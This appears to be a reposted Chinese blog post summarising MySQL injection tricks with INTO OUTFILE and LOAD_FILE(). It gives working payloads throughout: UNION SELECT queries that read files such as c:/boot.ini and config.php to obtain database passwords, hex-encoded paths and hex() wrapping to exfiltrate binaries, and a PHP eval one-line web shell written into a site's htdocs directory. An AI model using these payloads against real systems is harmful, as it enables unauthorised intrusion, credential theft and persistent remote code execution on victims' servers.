(1)outfile后面不能接0x開頭或者char轉換以后的路徑，只能是單引號路徑。這個問題在php注入中更加麻煩，因為會自動將單引號轉義成\',那么基本沒的玩了。

唯一的一種可能就是你使用mysql遠程連接，然后直接在mysql中執行命令，就沒有查詢限制了。當然，你要是找到了phpmyadmin，也可以。

(2)load_file，后面的路徑可以是單引號、0x、char轉換的字符。這而記得路徑中的斜杠是/而不是\。

一般用load_file來看config.php(即mysql的密碼),apache配置、servu密碼等。前提是要知道物理路徑。

(3)load_file可以在union中作為一個字段來用。如union select 1,load_file('c:/boot.ini'),3,4 from ka_admin等。

(4)load_file可以在where字句中使用。如 and length(load_file(0x633A2F626F6F742E696E69))>1

(5)load_file文件的時候，特別是想看exe等含有二進制的00等截斷或者回車換行等特殊符號時，可以結合hex函數。如union select 1,hex(load_file('c:/windows/notepad.exe')),3 from xxxx，這樣就不會存在截斷了，也不會一會斷行而截斷。自己再用個工具或者幾行代碼轉換回來就是了。

(6)outfile一句話(經典)：select '<?php eval($_POST[cmd])?>' into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

或者從表中

select * from a into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

(7)關于mysql多語句：直接在mysql中，可以同時select中使用update或者insert，但是php注入中就不行，至少我測試的是php的函數mysql_query是不行。

總結

以上是生活随笔為你收集整理的mysql 注入 file load_Mysql注入中into outfile和load_file()总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。